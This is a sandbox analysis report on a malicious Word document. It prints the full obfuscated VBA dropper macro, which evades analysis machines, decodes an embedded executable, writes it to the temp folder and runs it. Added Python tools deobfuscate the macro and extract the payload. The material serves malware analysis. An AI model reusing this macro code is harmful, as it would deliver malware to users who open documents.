contract_1610585.doc
This report was generated from a file or URL submitted to this web service on June 29th 2016 21:01:34 (UTC), run with the action script "Random desktop files".
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v4.31 © Hybrid Analysis
Indicators
Not all malicious and suspicious indicators are displayed.
-
Malicious Indicators 6
-
General
-
Contains ability to start/interact with device drivers
- details
- DeviceIoControl@KERNEL32.DLL from cyamopsis.exe (PID: 2596) (3 occurrences)
- source
- Hybrid Analysis Technology
- relevance
- 8/10
-
The input sample dropped a file that was identified as malicious
- details
- 2/53 Antivirus vendors marked dropped file "cyamopsis.exe" as malicious (classified as "UDS:DangerousObject.Multi" with 3% detection rate)
- source
- Binary File
- relevance
- 10/10
-
System Security
-
References security related windows services
- details
- "}[=hGG*GSS=jG_eGSS{+u%!!D_]F"a+ySSvV\E$WpE==+HzqSBzJ^===9^@@S%je9WGB===*qSVSSSS]~T====_=9^vCjcP]x9ht==Eq_%!!G\{"GC]*v"PaqSVSSSS[dV$^dY===VszP} \DSS]zbkd=={#"[zvf#Vd+#V]x+=t==Ew|_SCSS{!G_ztH#VTB}cgZ==#|bfeWSS[_+VBvSSS_BzH_PSSSh=&~+'[B9&S9Z{uWSSU}W$Ut]==+H{J!*G9zd$t==EK~T&VdZV&AwSSSS]hJ&+ySSv"~EG#V}Gw%==&BWV[JSvSEXJwF`\Dp}[BZ==#"
- source
- File/Memory
- relevance
- 7/10
-
Unusual Characteristics
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
- Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened"
- source
- Static Parser
- relevance
- 10/10
-
Contains embedded string that indicates auto-execute behavior
- details
- Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened"
- source
- File/Memory
- relevance
- 10/10
-
Hiding 1 Malicious Indicators
-
Suspicious Indicators 11
-
Anti-Reverse Engineering
-
Contains ability to register a top-level exception handler (often used as anti-debugging trick)
- details
- SetUnhandledExceptionFilter@KERNEL32.DLL from cyamopsis.exe (PID: 2596) (12 occurrences)
- source
- Hybrid Analysis Technology
- relevance
- 1/10
-
General
-
Contains ability to find and load resources of a specific module
- details
- FindResourceA@KERNEL32.DLL from cyamopsis.exe (PID: 2596) (3 occurrences)
- source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Installation/Persistence
-
Drops executable files
- details
- "cyamopsis.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
- source
- Binary File
- relevance
- 10/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "%WINDIR%\Globalization\Sorting\sortdefault.nls"
"WINWORD.EXE" touched file "C:\Windows\Fonts\staticcache.dat"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db"
"WINWORD.EXE" touched file "C:\Windows\system32\rsaenh.dll"
"WINWORD.EXE" touched file "C:\Windows\system32\en-US\KERNELBASE.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32\msxml6r.dll"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F4E1FA52-4A6A-4CE1-A2E4-81E608B57391}.tmp"
"WINWORD.EXE" touched file "C:\Windows\system32\en-US\MSCTF.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{77DCB57D-F9FA-46D7-A7AD-C37AC21310D6}.tmp" - source
- API Call
- relevance
- 7/10
-
Remote Access Related
-
Contains references to WMI/WMIC
- details
-
"root\cimv2" (Indicator: "root\cimv2")
"root\cimv2' $.G'W' chapfallenloacorticium$dstone'AS$Bcariasis'd'k v | %. !" (Indicator: "root\cimv2") - source
- File/Memory
- relevance
- 10/10
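The "root\cimv2" string matched here is the only fragment of the WMI usage that survives as a plain string: the macro listed further down under "Contains embedded VBA macros" assembles its sensitive strings at runtime from Mid/Left/Right/Ucase/Lcase/StrReverse calls over decoy words, so keyword matching sees the pieces but never the full namespace path, the WQL query or the ProgIDs. The Python script below is an added analysis aid and is not part of this report or of the sample. It implements a small evaluator for exactly that VBA expression subset and runs it over expressions copied verbatim from the listing, keyed by the macro's own variable names; the one runtime value, `dumpling` (the temp folder that palmistry() returns), is substituted with the placeholder "%TEMP%" as an assumption. What comes out is the go/no-go check: ministerially() connects to `winmgmts:\\.\root\cimv2`, runs `Select * from WIN32_PRODUCT WHERE Name LIKE 'Python %'` and returns 10 if anything matches, and UserForm_Initialize only calls bystander.nappy (the dropper) when that return value differs from 10. A machine with a "Python ..." MSI product installed, a common analysis-VM artefact, therefore never receives the payload.

```python
import re

# The macro's expression subset: string literals ("" escapes a quote; backslash is not an escape),
# integer literals, names, and the operators & + - ( ) , ; anything else is reported as an error.
_TOKEN_RE = re.compile(r'\s*(?:(?P<str>"(?:[^"]|"")*")|(?P<num>\d+)|(?P<ident>[A-Za-z_]\w*)'
                       r'|(?P<op>[&+\-(),])|(?P<bad>\S))')

# Built-in string functions the macro leans on; VBA's Mid/Left/Right are 1-based.
VBA_FUNCS = {
    "mid": lambda s, start, length: s[start - 1:start - 1 + length],
    "left": lambda s, n: s[:n],
    "right": lambda s, n: s[len(s) - n:],
    "ucase": lambda s: s.upper(),
    "lcase": lambda s: s.lower(),
    "strreverse": lambda s: s[::-1],
}

def tokenize(src):
    tokens = []
    for m in _TOKEN_RE.finditer(src):
        kind, text = m.lastgroup, m.group(m.lastgroup)
        if kind == "bad":
            raise ValueError(f"cannot tokenize {text!r} in {src!r}")
        tokens.append((kind, text[1:-1].replace('""', '"') if kind == "str" else int(text) if kind == "num" else text))
    return tokens + [("eof", None)]

class VbaExprEvaluator:
    """expr := term (('&'|'+'|'-') term)*;  term := string | number | name | name '(' args ')'.
    Names are case-insensitive; '&' concatenates, '+' concatenates strings and adds numbers.
    Precedence is flattened left-to-right, exact here since no expression mixes strings and numbers."""
    def __init__(self, env):
        self.env = {k.lower(): v for k, v in env.items()}

    def eval(self, src):
        self.toks, self.i = tokenize(src), 0
        value = self._expr()
        if self.toks[self.i][0] != "eof":
            raise ValueError(f"trailing tokens in {src!r}")
        return value

    def _take(self, expect=None):
        tok = self.toks[self.i]
        if expect is not None and tok != expect:
            raise ValueError(f"expected {expect}, got {tok}")
        self.i += 1
        return tok

    def _expr(self):
        value = self._term()
        while self.toks[self.i][0] == "op" and self.toks[self.i][1] in ("&", "+", "-"):
            op, rhs = self._take()[1], self._term()
            value = str(value) + str(rhs) if op == "&" else value + rhs if op == "+" else value - rhs
        return value

    def _term(self):
        kind, text = self._take()
        if kind in ("str", "num"):
            return text
        if kind != "ident":
            raise ValueError(f"unexpected token {kind} {text!r}")
        if self.toks[self.i] != ("op", "("):
            return self.env[text.lower()]  # plain variable reference
        self._take()
        args = [self._expr()]
        while self.toks[self.i] == ("op", ","):
            self._take()
            args.append(self._expr())
        self._take(("op", ")"))
        return VBA_FUNCS[text.lower()](*args)

# Expressions copied verbatim from the macro listing, keyed by the macro's variable names; evaluated in order.
MACRO_EXPRESSIONS = {
    # Function ministerially(): WMI namespace and WQL query used as the go/no-go check
    "reproach": r'Lcase("wi") + Lcase("NmGmT") + StrReverse("\\:s")',
    "abampere": r'Right("gorgerin.\", 2) & "root\cimv2"',
    "wmi_path": "reproach & abampere",
    "nonmonotonic": 'Left("Segonadal", 2) & Lcase("LECT * FRoM ")',
    "assume": 'Ucase("wIn3") & Ucase("2_pROduct ")',
    "iv": '''"WHER" & Left("E Name LIKE 'Python %'reestablish", 22)''',
    "query": "nonmonotonic + assume & iv",
    "cowberry": "2 - 63 + 39 + 32",  # UserForm_Initialize: nappy() runs only if ministerially() <> this
    # Function palmistry(): ProgID, method name and special-folder id (2 = TemporaryFolder)
    "tropic": 'Mid("eductionScextraregarding", 9, 2) & StrReverse(".gnitpir")',
    "curtal": 'Mid("enchafeFilalbite", 8, 3) & "eSystem" & Mid("excellencyObjectepanodos", 11, 6)',
    "rootless": "tropic + curtal",
    "ontogeny": 'Ucase("ge") + "tSpecialFolder"',
    "special_folder": "19 - 71 + 54",
    # Sub nappy(): drop path and launcher ProgID; Sub counterman(): method name and call type (1 = vbMethod)
    "altogeher": r'dumpling + Left("\cyalkalimetry", 3) + StrReverse("exe.sispoma")',
    "hysterocatalepsy": 'Left("WSescharotic", 2) & StrReverse("pirc") & Ucase("T.shELl")',
    "chaffy": 'Ucase("RU") & Left("nuncategorized", 1)',
    "archetype": "12 - 90 + 79",
}
ASSUMED_ENV = {"dumpling": "%TEMP%"}  # ASSUMPTION: stands in for palmistry()'s runtime result, the temp folder

def recover_macro_strings(expressions=MACRO_EXPRESSIONS, env=ASSUMED_ENV):
    ev, out = VbaExprEvaluator(env), {}
    for name, src in expressions.items():
        out[name] = ev.eval(src)
        ev.env[name.lower()] = out[name]  # later expressions may reference this name
    return out
```

Calling recover_macro_strings() returns every recovered value in a dict. Two practitioner notes: WIN32_PRODUCT enumeration is slow and makes Windows Installer re-validate every installed product, leaving MsiInstaller entries in the Application event log at document-open time, a corroborating artefact when hunting for this check; and the evaluator deliberately raises on anything outside the subset (an unknown variable, an unsupported function) rather than guessing, so expressions from a variant have to be added explicitly.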
-
System Security
-
Hooks API calls
- details
-
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
-
Unusual Characteristics
-
Contains embedded VBA macros with suspicious keywords
- details
-
Found suspicious keyword "StrReverse" which indicates: "May attempt to obfuscate specific strings"
Found suspicious keyword "Xor" which indicates: "May attempt to obfuscate specific strings"
Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
Found suspicious keyword "Binary" which indicates: "May read or write a binary file (if combined with Open)"
Found suspicious keyword "CallByName" which indicates: "May attempt to obfuscate malicious function calls"
Found suspicious keyword "Write" which indicates: "May write to a file (if combined with Open)"
Found suspicious keyword "Put" which indicates: "May write to a file (if combined with Open)"
Found suspicious keyword "CreateObject" which indicates: "May create an OLE object"
Found suspicious keyword "Open" which indicates: "May open a file" - source
- Static Parser
- relevance
- 10/10
-
Contains embedded string with suspicious keywords
- details
-
Found suspicious keyword "Windows" which indicates: "May enumerate application windows (if combined with Shell.Application object)"
Found suspicious keyword "Open" which indicates: "May open a file"
Found suspicious keyword "Lib" which indicates: "May run code from a DLL"
Found suspicious keyword "Put" which indicates: "May write to a file (if combined with Open)"
Found suspicious keyword "CreateObject" which indicates: "May create an OLE object"
Found suspicious keyword "CallByName" which indicates: "May attempt to obfuscate malicious function calls" - source
- File/Memory
- relevance
- 10/10
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "e9603367f0" to virtual address "0x779A4731" ("SysAllocStringByteLen@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "ba88de1400b98b7ba762ffe1" to virtual address "0x00164256"
"WINWORD.EXE" wrote bytes "c1a6752e" to virtual address "0x632910AC" (part of module "MSPTLS.DLL")
"WINWORD.EXE" wrote bytes "e9239969f0" to virtual address "0x779A5DEE" ("VariantChangeType@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "e99a5466f0" to virtual address "0x779A3E59" ("SysFreeString@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "95857e2e" to virtual address "0x63189904" (part of module "RICHED20.DLL")
"WINWORD.EXE" wrote bytes "9f491b10" to virtual address "0x62B41F20" (part of module "GKWORD.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba9467130068dcf5a762c3" to virtual address "0x05A088D4"
"WINWORD.EXE" wrote bytes "4053ab775858ac77186aac77653cad770000000000bf28770000000056cc2877000000007cca2877000000003768c5756a2cad77d62dad77000000002069c5750000000029a6287700000000a48dc57500000000f70e287700000000" to virtual address "0x77151000" (part of module "NSI.DLL")
"WINWORD.EXE" wrote bytes "ba08e11400b98b7ba762ffe1" to virtual address "0x00164292"
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba9468130068dcf5a762c3" to virtual address "0x05A08954"
"WINWORD.EXE" wrote bytes "ba34df1400b98b7ba762ffe1" to virtual address "0x00164242"
"WINWORD.EXE" wrote bytes "b811110000663d33c0bad04fa40568dcf5a762c3" to virtual address "0x05A08914"
"WINWORD.EXE" wrote bytes "ba18421300b98b7ba762ffe1" to virtual address "0x001642CE"
"WINWORD.EXE" wrote bytes "c4ca287780bb287752ba28779fbb287708bb287746ce287761382977de2f2977d0d92877000000001779ed754f91ed757f6fed75f4f7ed7511f7ed75f283ed75857eed7500000000" to virtual address "0x6BC51000" (part of module "MSIMG32.DLL")
"WINWORD.EXE" wrote bytes "8c28a628" to virtual address "0x692378E4" (part of module "OART.DLL")
"WINWORD.EXE" wrote bytes "b811110000663d33c0bae0f81b0068dcf5a762c3" to virtual address "0x001639BC"
"WINWORD.EXE" wrote bytes "b800000000663d33c0bad467130068dcf5a762c3" to virtual address "0x05A088F4"
"WINWORD.EXE" wrote bytes "ba24bc1200b98b7ba762ffe1" to virtual address "0x0016427E"
"WINWORD.EXE" wrote bytes "1bb5a628" to virtual address "0x6A56CA70" (part of module "GFX.DLL") - source
- Hook Detection
- relevance
- 10/10
-
Hiding 2 Suspicious Indicators
-
Informative 7
-
Environment Awareness
-
Contains ability to query machine time
- details
- GetSystemTimeAsFileTime@KERNEL32.DLL from cyamopsis.exe (PID: 2596) (3 occurrences)
- source
- Hybrid Analysis Technology
- relevance
- 1/10
-
General
-
Contains embedded VBA macros
- details
-
File "ThisDocument.cls" (Streampath: "Macros/VBA/ThisDocument") has code: "Sub fiji(eradicate)
Dim coydog As Variant
Dim ballistic As Long
Dim gumbolimbo As Variant
doublethink = "epitomize"
caucasus = cheetah
Close #eradicate
doublethink = "cotillion"
End Sub
Function guildhall(penetralia) As String
Dim derr As Long
Dim hewer As String
Dim masses(63) As Long
Dim apprehensible() As Byte
Dim lox() As Byte
Dim chili As Integer
Dim depicting As Long
Dim capital As Long
Dim dimidiate(63) As Long
Dim quarterdeck As Long
Dim sapwood(63) As Long
fatten = Mid("epicurusimpecrystallite", 9, 4) & Lcase("RTuRBAB") & Mid("langurilitymisinterpretation", 7, 5)
doublethink = Lcase("si") & Left("napisatheling", 5)
Dim mardi(255) As Byte
ranitidine = 95 + 12 + 257941
bucephalus = 112 + 9 + 135
notoriety = 57 + 65479
dustcloth = 16515072
mycoplasmatales = 108 + 100 + 65072
ferrocerium = 262144
asserting = 16711680
boredom = 1 - 95 + 158
garbage = 4032
spondaic = 63
bisexuality = 99 + 70 + 3927
adrenocortical = 255
Dim millenary As Byte
Dim illustriousness() As Byte
illustriousness = StrConv(penetralia, vbFromUnicode)
Dim amenity As Integer
For guardhouse = 0 To UBound(illustriousness)
illustriousness(guardhouse) = illustriousness(guardhouse) Xor 18
Next guardhouse
For fracas = 46 To 71
unconsummated = 71
cat = cat - 261
depredator = Mid("brassbandmeinterdigitate", 10, 2) & Ucase("rOdO") & Ucase("am")
depredator = "hi" & Left("ddenfooting", 4) & StrReverse("eti")
Next fracas
guffaw = StrConv(illustriousness, vbUnicode)
chili = 2
prank = 122
For derr = 0 To 255
Select Case derr
Case 65 To 90
mardi(derr) = derr - 65
Case 97 To prank
mardi(derr) = derr - 71
Case 48 To 57
mardi(derr) = derr + 4
Case 43
mardi(derr) = 62
Case 47
mardi(derr) = 63
End Select
Next derr
For derr = 0 To 63
dimidiate(derr) = derr * boredom
sapwood(derr) = derr * bisexuality
masses(derr) = derr * ferrocerium
Next derr
apprehensible = StrConv(guffaw, vbFromUnicode)
albitic = 4
ReDim lox((((UBound(apprehensible) + 1) \ albitic) * 3) - 1)
For quarterdeck = 0 To UBound(apprehensible) Step 4
apeman = apprehensible(quarterdeck)
temper = 3
depicting = masses(mardi(apeman)) + sapwood(mardi(apprehensible(quarterdeck + 1))) + _
dimidiate(mardi(apprehensible(quarterdeck + 2))) + mardi(apprehensible(quarterdeck + temper))
derr = depicting And asserting
lox(capital) = derr \ notoriety
derr = depicting And mycoplasmatales
lox(capital + 1) = derr \ bucephalus
lox(capital + 2) = depicting And adrenocortical
capital = capital + 3
Next quarterdeck
hewer = StrConv(lox, vbUnicode)
If chili Then hewer = Left$(hewer, Len(hewer) - chili)
guildhall = hewer
End Function
Public Sub AutoOpen()
Dim dupe As Byte
Dim ademptum As Long
fatten = "bawdily"
Dim alias As Integer
Dim hecha As Variant
alias = 25 Mod (21)
cat = cat + 125
If alias < 17 - 139 Then
cat = cat / 456
TabFootnotes
Else
Dim gloomy As Variant
harrisburg = medic.Height
alliaceae = 84
cryostat = 79
If alliaceae + cryostat < 64 Then
alliaceae = StrReverse("ap") & Right("beingstor", 4)
haemoproteidae = StrReverse("ok") + Lcase("ine")
Else
cryostat = 8
End If
End If
End Sub
Sub InsertBeforeMethod()
Dim MyText As String
Dim MyRange As Object
Set MyRange = ActiveDocument.Range
MyText = "<Replace this with your text>"
' Selection Example:
Selection.InsertBefore (MyText)
' Range Example: Inserts text at the beginning
' of the active document.
MyRange.InsertBefore (MyText)
End Sub
Sub TabFootnotes()
For s = 1 To ActiveDocument.Footnotes.Count
ActiveDocument.Footnotes(s).Range.Select
With Selection
.Collapse Direction:=wdCollapseStart
.MoveLeft Unit:=wdCharacter, Count:=1, Extend:=wdExtend
.TypeText Text:=vbTab
End With
Next
End Sub"
File "bystander.bas" (Streampath: "Macros/VBA/bystander") has code: "Dim cat As Integer
Dim fatten As String
Dim phylactery As Long
Dim doublethink As String
Dim commixture As Integer
Sub InsertParagraphMethod()
Dim MyRange As Object
Set MyRange = ActiveDocument.Range
' Selection Example:
Selection.InsertParagraph
' Range Example:
MyRange.Collapse Direction:=wdCollapseStart
MyRange.InsertParagraph
End Sub
Sub inherited(representable, crucifixion)
Dim grasshopper As Long
Dim congregationalist As Byte
fatten = Mid("spirituouscaimprudently", 11, 2) & Ucase("PTaIn")
Open representable For Binary Access Read Write As #crucifixion
fatten = Right("endamagehy", 2) & "pony" & "my"
End Sub
Function tomfool(cope)
Dim mikania As Variant
Dim bus As Variant
Dim constitutionalist As Long
amygdalus = StrConv(cope, 128)
lawman = argillite
bluejacket = acneiform
tomfool = amygdalus
End Function
Sub goodnatured(dovetailing, adynamy, hospitable)
Dim montserrat As Byte
Dim supplant() As Byte
Dim brasenia As Long
supplant = tomfool(dovetailing)
huascaran = pigwidgeon
hangeron = hospitable
Put #hangeron, , supplant
End Sub
Function ministerially()
On Error GoTo contemptuously
Dim argute As String
nonmonotonic = Left("Segonadal", 2) & Lcase("LECT * FRoM ")
Dim dipsacus As Byte
fatten = "mincer"
assume = Ucase("wIn3") & Ucase("2_pROduct ")
impolitic = 72
invention = 63
If impolitic + invention < 80 Then
impolitic = Right("excruciatingunh", 3) + Ucase("ANdsO") + Right("apomictme", 2)
bogtrotter = Lcase("Vo") & Lcase("ulu")
Else
invention = 92
End If
Dim toothpick As Byte
iv = "WHER" & Left("E Name LIKE 'Python %'reestablish", 22)
doublethink = "an" & Right("foolishglic", 4) & "an"
commixture = commixture / 176
reproach = Lcase("wi") + Lcase("NmGmT") + StrReverse("\\:s")
fatten = "asleep"
abampere = Right("gorgerin.\", 2) & "root\cimv2"
Set invenit = GetObject(reproach & abampere)
commonlaw = 71
about = 87
If commonlaw + about < 14 Then
commonlaw = Mid("chapfallenloacorticium", 11, 3) & "dstone"
aloes = Ucase("AS") & "cariasis"
Else
about = 16
End If
Set clipper = invenit.ExecQuery(nonmonotonic + assume & iv)
If clipper.Count > 0 Then
ministerially = 10
End If
contemptuously:
End Function
Sub nappy()
nescape = 71
Select Case nescape
Case 15 To 17
Dim cancel As Long
cat = cat Mod 149
fatten = Ucase("Bo") + Left("reamorphophallus", 2)
Case 36 To 43
Dim drypis As Byte
cat = cat * 1
fatten = Right("producertr", 2) & Ucase("IgeM") & Mid("assholeinalaxon", 8, 4)
Case 71 To 83
commixture = commixture - 364
cat = cat * 4
quad = "cucumis"
Dim dumpling As String
End Select
batholithic = atn(2)
If batholithic <> 61 Then
phylactery = phylactery - 203
Dim altogeher As String
dumpling = palmistry
Dim entering As String
Else
commixture = commixture Xor 356
End If
altogeher = dumpling + Left("\cyalkalimetry", 3) + StrReverse("exe.sispoma")
aridity = arthropodal
felis = FreeFile
commixture = commixture Mod 192
dacron = 45 - 35 - 86 + 76
phylactery = phylactery - 365
derange = 77
Select Case derange
Case 26 To 29
Dim communicating As Integer
phylactery = phylactery Xor 340
cat = cat - 127
Case 77 To 94
doublethink = Mid("gibraltarbathreatening", 10, 2) & Ucase("ssINet")
swiftness = dacron
End Select
endosperm = Log(83)
If endosperm <> 59 Then
inherited altogeher, felis
cancer = medic.luxurious
fatten = Left("inproteles", 2) & Left("somngel", 4) & Ucase("IA")
Else
cat = cat Xor 352
End If
unearthly = 74
Select Case unearthly
Case 26 To 32
Dim bacteriostatic As Byte
doublethink = Right("porkch", 2) & Lcase("ristma") & Right("formonlysberry", 6)
commixture = commixture / 394
Case 74 To 84
doublethink = "bibos"
anicon = cancer
commixture = commixture * 2
End Select
inning = Log(13)
If inning <> 74 Then
listing = ThisDocument.guildhall(anicon)
alfilaria = cylindrical
installment = Ucase("de") & Lcase("PReCaTe")
Else
commixture = commixture / 438
End If
exhibitionist = sqr(22)
If exhibitionist <> 55 Then
groggy = veritable
senility = Len(listing)
Dim excitement As Integer
Else
doublethink = "mallard"
End If
doublethink = Lcase("Buc") & Lcase("CiNid") & Ucase("Ae")
cat = cat Mod 96
phylactery = phylactery / 446
bystander.goodnatured listing, swiftness, felis
alterable = 53
Select Case alterable
Case 33 To 35
Dim maniraptor As String
cat = cat Mod 113
fatten = Ucase("ca") + Left("lvadosfastigiate", 6)
Case 53 To 71
phylactery = phylactery And 348
doublethink = Right("lazarhouseco", 2) + Lcase("MmON") + Mid("bigamistlychokey", 9, 2)
cat = cat Xor 483
accelerative = felis
Case 38 To 45
Dim prevention As Long
commixture = commixture / 352
phylactery = phylactery * 3
End Select
circularization = 77
Select Case circularization
Case 22 To 26
Dim cabman As Byte
cat = cat * 2
cat = cat + 273
Case 77 To 82
commixture = commixture Xor 237
ThisDocument.fiji accelerative
fatten = Left("ecshortrange", 2) + Left("lampsiadomi", 7)
hysterocatalepsy = Left("WSescharotic", 2) & StrReverse("pirc") & Ucase("T.shELl")
Set charms = CreateObject(hysterocatalepsy)
Case 4 To 5
Dim legato As String
fatten = Lcase("dU") & Lcase("ty")
phylactery = phylactery And 212
End Select
khaya = 90 + 5 - 38
Select Case khaya
Case 57 To 65
cat = cat / 295
fatten = "stapelia"
counterman charms, altogeher
Case 18 To 25
Dim exasperate As String
phylactery = phylactery - 333
cat = cat * 3
Case 12 To 13
Dim beading As Integer
fatten = "hauteur"
doublethink = "friedcake"
End Select
End Sub
Sub counterman(antimagnetic, philologist)
Dim coca As Long
Set caracoler = antimagnetic
archetype = 12 - 90 + 79
If sin(archetype) <> 58 Then
chaffy = Ucase("RU") & Left("nuncategorized", 1)
Else
chaffy = "pennya"
End If
clubbing = CallByName(caracoler, chaffy, archetype, philologist)
End Sub
Sub SortText()
' A macro to sort the selected text, if the user has selected
' more than one paragraph
If Documents.Count > 0 Then
' The user has at least one document open.
If Selection.Paragraphs.Count > 1 Then
' The user has selected more than one paragraph
' of text, so sort it.
Selection.Sort
Else
' Tell the user what to do.
MsgBox "Please select two or more paragraphs and try again."
End If
End If
End Sub
Sub FormattedTextProperty()
' This example copies the first paragraph in the document, including
' its formatting, and inserts the formatted text at the insertion
' point.
Selection.Collapse Direction:=wdCollapseStart
Selection.FormattedText = ActiveDocument.Paragraphs(1).Range
End Sub
Function palmistry()
panicle = sin(83)
If panicle <> 54 Then
Dim perceived As Long
Dim horsetail As Variant
Else
commixture = commixture / 272
End If
tropic = Mid("eductionScextraregarding", 9, 2) & StrReverse(".gnitpir")
curtal = Mid("enchafeFilalbite", 8, 3) & "eSystem" & Mid("excellencyObjectepanodos", 11, 6)
rootless = tropic + curtal
Dim chloramphenicol As String
Set cornopean = VBA.CreateObject(rootless)
mycobacteria = 44 + 86 - 129
ontogeny = Ucase("ge") + "tSpecialFolder"
Dim sciences As Variant
humid = geyser
troppo = Ucase("mOu") & Mid("gaiterntainfdeum", 7, 6) & Right("motiflax", 3)
phylactery = phylactery Xor 485
denouement = tan(55)
If denouement <> 71 Then
palmistry = CallByName(cornopean, ontogeny, mycobacteria, 19 - 71 + 54)
Else
fatten = "dunderhead"
End If
End Function"
File "medic.frm" (Streampath: "Macros/VBA/medic") has code: "Public Sub UserForm_Initialize()
gaining = ministerially
cowberry = 2 - 63 + 39 + 32
If gaining <> cowberry Then
bystander.nappy
End If
End Sub" - source
- Static Parser
- relevance
- 10/10
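Read as a whole, the listing gives the execution chain: AutoOpen touches medic.Height, which loads the medic UserForm and so fires UserForm_Initialize; that calls ministerially() (the WMI check) and, on a non-match, bystander.nappy, which resolves the temp folder through Scripting.FileSystemObject.GetSpecialFolder(2), opens <temp>\cyamopsis.exe for binary write (inherited), reads the stored payload from the form (`cancer = medic.luxurious`), unpacks it with ThisDocument.guildhall, writes it (goodnatured), closes the handle (fiji) and launches it through WScript.Shell.Run invoked via CallByName (counterman). The unpacking in guildhall() is: XOR every byte of the stored string with 18, base64-decode the result with a hand-built table that is the standard alphabet (the decoy arithmetic resolves to the shifts 262144, 4096 and 64 and the masks 0xFF0000, 0xFF00 and 0xFF, with '=' and every other character mapping to 0), then always drop the last two decoded bytes. The Python below is an added port of that routine for extracting such a payload offline; it is not code from the report or the sample, and its ten-byte input is constructed for the test (the first bytes of a typical DOS header), not taken from the real dropped file. The string listed under "References security related windows services" above maps entirely into the base64 alphabet under the same XOR (for instance "SS" is "AA" and "===" is "///"), which is what a fragment of the encoded blob looks like when it is picked up from memory.

```python
import base64

XOR_KEY = 18        # the macro's  illustriousness(guardhouse) Xor 18
TRAILING_DROP = 2   # the macro's  chili = 2 ... Left$(hewer, Len(hewer) - chili)

# Value table built by the macro's `mardi` loop: the standard base64 alphabet, with every
# other byte value (including the '=' pad) left at 0.
_B64_VALUE = [0] * 256
for _c in range(256):
    if 65 <= _c <= 90:        # 'A'..'Z' -> 0..25
        _B64_VALUE[_c] = _c - 65
    elif 97 <= _c <= 122:     # 'a'..'z' -> 26..51
        _B64_VALUE[_c] = _c - 71
    elif 48 <= _c <= 57:      # '0'..'9' -> 52..61
        _B64_VALUE[_c] = _c + 4
    elif _c == 43:            # '+'
        _B64_VALUE[_c] = 62
    elif _c == 47:            # '/'
        _B64_VALUE[_c] = 63


def guildhall(penetralia: str) -> bytes:
    """Port of the macro's guildhall(): XOR every byte with 18, decode the result as base64
    with the lenient table above, then unconditionally drop the last two bytes."""
    data = bytes(b ^ XOR_KEY for b in penetralia.encode("latin-1"))
    if len(data) % 4:
        raise ValueError("length must be a multiple of 4; the macro would index past the end")
    out = bytearray()
    for i in range(0, len(data), 4):
        # masses/sapwood/dimidiate multiply by 262144, 4096 and 64: one 24-bit group
        group = (_B64_VALUE[data[i]] << 18 | _B64_VALUE[data[i + 1]] << 12
                 | _B64_VALUE[data[i + 2]] << 6 | _B64_VALUE[data[i + 3]])
        # asserting / mycoplasmatales / adrenocortical are the masks 0xFF0000, 0xFF00, 0xFF
        out += bytes(((group >> 16) & 0xFF, (group >> 8) & 0xFF, group & 0xFF))
    return bytes(out[:max(len(out) - TRAILING_DROP, 0)])


def encode_like_macro(payload: bytes) -> str:
    """Inverse transform (base64, then XOR 18); used here only to build test input. Because
    guildhall() always trims two bytes, only a payload whose base64 ends in '==' (len % 3 == 1)
    round-trips exactly; other lengths lose one or two real trailing bytes."""
    return bytes(b ^ XOR_KEY for b in base64.b64encode(payload)).decode("latin-1")


# CONSTRUCTED test input: the first ten bytes of a typical DOS header, not the real dropped file.
SAMPLE_PE_PREFIX = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00"


def demo() -> bytes:
    """Store the constructed sample the way the document does, then recover it."""
    return guildhall(encode_like_macro(SAMPLE_PE_PREFIX))


if __name__ == "__main__":
    print(demo())
```

To extract the real payload, read the string the macro consumes (the `luxurious` value of the medic form) out of the document's form storage, for example with oletools, and pass it to guildhall(); the output should start with "MZ" if the stored blob is the complete executable the sandbox saw dropped.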
-
Creates a writable file in a temporary directory
- details
-
"WINWORD.EXE" created file "%TEMP%\~DFDCEE8A7DB319D9DD.TMP"
"WINWORD.EXE" created file "%TEMP%\~DFDE32DA9D1B7B80DA.TMP"
"WINWORD.EXE" created file "%TEMP%\VBE\MSForms.exd"
